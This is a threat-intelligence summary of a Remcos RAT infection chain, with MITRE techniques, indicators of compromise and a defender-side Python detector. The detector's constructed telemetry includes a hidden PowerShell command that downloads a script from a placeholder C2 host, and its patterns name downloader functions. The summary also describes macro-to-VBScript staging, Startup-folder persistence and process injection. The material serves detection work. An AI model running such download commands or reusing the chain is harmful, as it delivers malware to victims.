Morphisec Labs has identified a new Remcos Trojan infection chain delivered through financial-themed phishing emails that lure users into opening a malicious Excel file. The multi-stage attack uses VBScript and PowerShell to fetch further payloads from a C2 server, establishes persistence via the Startup folder, and culminates in an RC4-encrypted Remcos configuration and the final Remcos RAT payload. #Remcos #BreakingSecurity #WellsFargo #FISGlobal #ACHPayment
Key points
- Remcos is a commercial remote access trojan (RAT) developed by BreakingSecurity, with a free version available.
- The phishing lure centers on financial topics (Wells Fargo, FIS Global, ACH Payment) to entice opening a malicious Excel attachment.
- The infection chain begins with a malicious .xls that contains Visual Basic code executed when macros are enabled.
- Multiple scripting stages are used (VBScript, PowerShell) to download and decode subsequent stages from a C2 server.
- Persistence is achieved by copying scripts to the Startup folder, while the C2 delivers additional stages and final payloads.
- The final payload is the Remcos RAT; its configuration is stored RC4-encrypted in a resource and decrypted after extraction.
MITRE Techniques
- [T1566.001] Spearphishing Attachment – Lures user to open a malicious Excel file; “The attacker lures a user to open a malicious Excel file that contains ‘confidential information’ which starts the infection chain.”
- [T1204.002] User Execution: Malicious File – “The .xls file contains a Visual Basic code that executes once a user opens the file and enables macros.”
- [T1059.005] Command and Scripting Interpreter: Visual Basic – “The .vbs reads the PowerShell command that is written to F variable, a FileSystemObject CLSID to F2, and a second CLSID to F3.”
- [T1059.001] PowerShell – “PowerShell command downloads the file from 209.127.19[.]101/win.vbs in this case.”
- [T1105] Ingress Tool Transfer – “Inside QAITB.vbs is a reversed PowerShell command which downloads the next stage and saves it to disk.”
- [T1547.001] Boot or Logon Autostart: Startup Folder – “Set persistence by copying the script to the Startup folder.”
- [T1027] Obfuscated/Compressed Files and Information – “RC4 decrypt the encrypted section using the key.”
- [T1055] Process Injection – “The injector is loaded into memory and the malware calls a function that injects the payload into RegAsm.exe.”
- [T1071.001] Web Protocols – “This infection chain largely depends on the C2 server, which stores the required files for each stage.”
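As an added defender-side example (not code from the Morphisec write-up), the Python below correlates constructed process-creation and file-write telemetry against the stages listed in the key points and MITRE techniques above: Excel spawning a script host, the script host launching a downloading PowerShell command, a script written to the Startup folder, and the script host launching RegAsm.exe. The event fields, the three-stage alert threshold and the C2 placeholder are assumptions.

```python
import re
from dataclasses import dataclass

# Process names and patterns taken from the chain described above (lower-cased).
OFFICE_APPS = {"excel.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
STARTUP_DIR = re.compile(r"\\start menu\\programs\\startup\\", re.I)
DOWNLOADER = re.compile(r"downloadfile|downloadstring|invoke-webrequest|webclient", re.I)

@dataclass
class Event:
    kind: str          # "process" (creation) or "file" (write)
    image: str         # created process, or the process writing the file
    parent: str = ""   # parent image, for process events
    cmdline: str = ""  # command line, for process events
    target: str = ""   # path written, for file events

def chain_findings(events):
    """Map each suspicious event to the MITRE technique it evidences."""
    findings = []
    for e in events:
        img, par = e.image.lower(), e.parent.lower()
        if e.kind == "process":
            if par in OFFICE_APPS and img in SCRIPT_HOSTS:
                findings.append(("T1204.002", f"{e.parent} spawned {e.image}"))
            elif par in SCRIPT_HOSTS and img == "powershell.exe" and DOWNLOADER.search(e.cmdline):
                findings.append(("T1105", "script host ran a downloading PowerShell command"))
            elif par in SCRIPT_HOSTS and img == "regasm.exe":
                findings.append(("T1055", f"{e.parent} launched RegAsm.exe"))
        elif e.kind == "file" and img in SCRIPT_HOSTS | {"powershell.exe"}:
            if STARTUP_DIR.search(e.target):
                findings.append(("T1547.001", f"{e.image} wrote to the Startup folder"))
    return findings

def looks_like_remcos_chain(events, min_stages=3):
    """Alert only when several distinct stages of the chain appear together."""
    return len({tech for tech, _ in chain_findings(events)}) >= min_stages

# Constructed sample telemetry (not real logs); the C2 host is a placeholder.
SAMPLE = [
    Event("process", "EXCEL.EXE", "explorer.exe", "EXCEL.EXE invoice.xls"),
    Event("process", "wscript.exe", "EXCEL.EXE", "wscript.exe C:\\Temp\\QAITB.vbs"),
    Event("process", "powershell.exe", "wscript.exe",
          "powershell -w hidden (New-Object Net.WebClient).DownloadFile('http://C2-PLACEHOLDER/win.vbs','win.vbs')"),
    Event("file", "wscript.exe", target="C:\\Users\\u\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\win.vbs"),
    Event("process", "RegAsm.exe", "wscript.exe", "RegAsm.exe"),
]
```

Running `chain_findings(SAMPLE)` yields one finding per stage in order, and `looks_like_remcos_chain(SAMPLE)` is true because four distinct techniques appear together; a lone Office-to-script-host event alone does not trip the alert.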
Indicators of Compromise
- [Hash] Email-related IOCs – c221b6eb8437d1f43ebffae9e51c7d330016290d048cfff2f402a7508b1e16e3, 8740cdcef9e825fd5105b021e0616a1d6a41f761c92f29127cd000c8500f70e6, and 5 more hashes (malicious email attachments used in the campaign)
- [Hash] XLSs – 6ad5d2aae0cb58f943f39d8b43492fd6007cd8caeeaaea03013194572756b124, 85c4808b3ed64480ae0d9f5c6fdaade6c7298f89cb4b799f0d5510b674d0a367, and 3 more hashes
- [Hash] XLSs .vbs – e0306366dd9c04bc92421d855a116d145e4b9afe4852bc77a02089d363d031a4, 1e7dba5f19588eeceffb45e96f4673ce181d64392805c5a78e83ae8c15d42d61, and 9 more hashes
- [URL] URLs – hxxp://kingspalmhomes[.]com/wprl/Protected Client.vbs, hxxp://kingspalmhomes[.]com/admin/Protected Client.vbs, hxxp://209.127.19[.]101/win.vbs, and additional related paths
- [Domain] Domains – fisintegrateds[.]com, kingspalmhomes[.]com, gotovacoil[.]com, dreamwatchevent[.]com, 209.127.19[.]101
- [Hash] Final Payload (Remcos) – 79AD11D52EA3D0BD956CAD871396C8DA2C9A76FFFC02E694339B7FE8B6CE18EA, CFD29C1AC568E0A21B5F2C05B96BB5BBF2848E89BD6DBDDF4C69DAB3B1CD8A32, and 3 more hashes
- [Domain] Remcos C2s – shiestynerd[.]dvrlists[.]com, breakingsecurity[.]dvrlists[.]com, freshdirect[.]dvrlists[.]com
Read more: https://blog.morphisec.com/remcos-trojan-analyzing-attack-chain